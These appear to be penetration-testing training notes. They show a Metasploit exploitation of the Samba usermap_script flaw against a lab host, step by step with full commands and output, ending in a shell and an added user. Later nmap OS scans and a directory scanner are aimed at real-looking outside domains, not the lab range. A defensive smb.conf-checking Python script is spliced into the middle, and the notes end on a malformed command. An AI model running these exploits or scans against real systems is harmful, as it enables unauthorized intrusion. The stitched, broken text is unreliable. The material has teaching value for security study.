Penetration Testing Training, March 13
Day 1: Summary of the Main Labs
First, a Struts2 vulnerability was exploited; it allows arbitrary commands to be executed directly, giving control of the host.

Lab environment:
Kali Linux as the attack platform; OWASP as the target machine.
2003 and Metasploitable: confirm they can be reached successfully.
Use Metasploit to attack the Samba service on the target machine and obtain a shell:

    search samba                        find the relevant modules
    use multi/samba/usermap_script      select the exploit module
    show payloads                       list the payloads compatible with this exploit module
    set payload cmd/unix/bind_netcat    choose netcat to provide the shell once the exploit succeeds
    show options                        show the parameters that need to be set
    set RHOST 10.10.10.254              set the target host
    exploit                             launch the attack
1. First install the virtual machine software, start Kali, OWASP, Metasploitable and the other tools, and set up the environment so that the hosts can reach each other over the network. NAT mode was chosen for the network configuration, with the address range 10.10.10.0/24.
2. Start the Kali VM and switch to root. First enter msfconsole and change the initial password to 123456:

    msf > passwd
    [*] exec: passwd

    输入新的 UNIX 密码:
    重新输入新的 UNIX 密码:
    passwd:已成功更新密码

Then look for Samba modules:

    msf > search samba

    Matching Modules
    ================

       Name                                             Disclosure Date  Rank       Description
       ----                                             ---------------  ----       -----------
       auxiliary/admin/smb/samba_symlink_traversal                       normal     Samba Symlink Directory Traversal
       auxiliary/dos/samba/lsa_addprivs_heap                             normal     Samba lsa_io_privilege_set Heap Overflow
       auxiliary/dos/samba/lsa_transnames_heap                           normal     Samba lsa_io_trans_names Heap Overflow
       auxiliary/dos/samba/read_nttrans_ea_list                          normal     Samba read_nttrans_ea_list Integer Overflow
       exploit/freebsd/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (*BSD x86)
       exploit/linux/samba/chain_reply                  2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
       exploit/linux/samba/lsa_transnames_heap          2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
       exploit/linux/samba/setinfopolicy_heap           2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
       exploit/linux/samba/trans2open                   2003-04-07       great      Samba trans2open Overflow (Linux x86)
       exploit/multi/samba/nttrans                      2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
       exploit/multi/samba/usermap_script               2007-05-14       excellent  Samba \
       exploit/osx/samba/lsa_transnames_heap            2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
       exploit/osx/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
       exploit/solaris/samba/lsa_transnames_heap        2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
       exploit/solaris/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
       exploit/unix/misc/distcc_exec                    2002-02-01       excellent  DistCC Daemon Command Execution
       exploit/unix/webapp/citrix_access_gateway_exec   2010-12-21       excellent  Citrix Access Gateway Command Execution
       exploit/windows/http/sambar6_search_results      2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
       exploit/windows/license/calicclnt_getconfig      2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
       post/linux/gather/enum_configs                                    normal     Linux Gather Configurations
Select the exploit module:

    msf > use multi/samba/usermap_script

List the payloads compatible with this exploit module:

    msf exploit(usermap_script) > show payloads

    Compatible Payloads
    ===================

       Name                                Disclosure Date  Rank    Description
       ----                                ---------------  ----    -----------
       cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
       cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
       cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
       cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
       cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
       cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
       cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
       cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
       cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
       cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
       cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
       cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
       cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
       cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
       cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
       cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
       cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
       cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
       cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
       cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
       cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
       cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

Choose netcat to provide the shell once the exploit succeeds, then view the parameters that need to be set:

    msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
    payload => cmd/unix/bind_netcat
    msf exploit(usermap_script) > show options

Set the target host and launch the attack:

    msf exploit(usermap_script) > set RHOST 10.10.10.254
    RHOST => 10.10.10.254
    msf exploit(usermap_script) > exploit
    [*] Started bind handler
    [*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800

Control of the 10.10.10.254 machine has been obtained; a user can be added (useradd test), and the user was created successfully.
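The module name usermap_script refers to Samba's "username map script" smb.conf option, which the affected 3.0.x releases (3.0.20 through 3.0.25rc3) invoked through a shell with the client-supplied username. As an added defender-side check that is not part of these training notes, the following Python parses an smb.conf and flags that option wherever it appears; both configuration samples are constructed and the script path in the risky sample is hypothetical.

```python
import re

# Constructed smb.conf samples (not from the lab target): the first still carries the
# risky option, the second uses a static 'username map' file instead.
RISKY_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   ; hypothetical script path, for illustration only
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
SAFE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   username map = /etc/samba/smbusers
[tmp]
   path = /tmp
"""

def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}; keys are normalised to lower
    case with single spaces (as testparm prints them), comments/blanks skipped."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][" ".join(key.lower().split())] = value.strip()
    return sections

def usermap_script_findings(text):
    """One finding per 'username map script' occurrence; an empty list means clean.
    Only [global] is effective, but a copy in a share section is reported too."""
    findings = []
    for section, params in parse_smb_conf(text).items():
        script = params.get("username map script")
        if script:
            findings.append(f"[{section}] username map script = {script}: Samba "
                            "runs it via a shell; remove it or use a static 'username map' file")
    return findings
```

Run it against the live smb.conf on a Samba host (or the output of testparm -s) to confirm the option is absent; an empty list is the expected result after remediation.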
Host discovery notes:

    -PU    UDP ping
    -sn    host discovery only, do not list services
    -Pn    do not use ping (treat the host as up)

    nmap -sS -Pn xx.xx.xx.xx                        TCP SYN scan, no ICMP sent
    nmap -sV -Pn xx.xx.xx.xx                        list detailed service information
    nmap -PO -script=smb-check-vulns xx.xx.xx.xx    look for the MS08-067 vulnerability
nmap scans

    msf > nmap
    msf > nmap -sV -Pn 10.10.10.254
    [*] exec: nmap -sV -Pn 10.10.10.254

    Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:38 CST
    Nmap scan report for 10.10.10.254
    Host is up (0.00020s latency).
    All 1000 scanned ports on 10.10.10.254 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

    msf > nmap -PO -script=smb-check-vulns 10.10.10.254
    [*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

    Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 16:47 CST
    Nmap scan report for 10.10.10.254
    Host is up (0.00021s latency).
    All 1000 scanned ports on 10.10.10.254 are filtered
    MAC Address: 00:50:56:E7:1B:31 (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
    msf > nmap -O www.ctsi.com.cn
    [*] exec: nmap -O www.ctsi.com.cn

    Starting Nmap 6.46 ( http://nmap.org ) at 2015-03-13 17:16 CST
    Nmap scan report for www.ctsi.com.cn (211.100.35.132)
    Host is up (0.0054s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE
    80/tcp open  http
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
    No exact OS matches for host (test conditions non-ideal).

    OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds

    msf > use auxiliary/scanner/http/dir_scanner
    msf auxiliary(dir_scanner) > set THREADS 50
    THREADS => 50
    msf auxiliary(dir_scanner) > set RHOSTS www.http://www.35331.cn/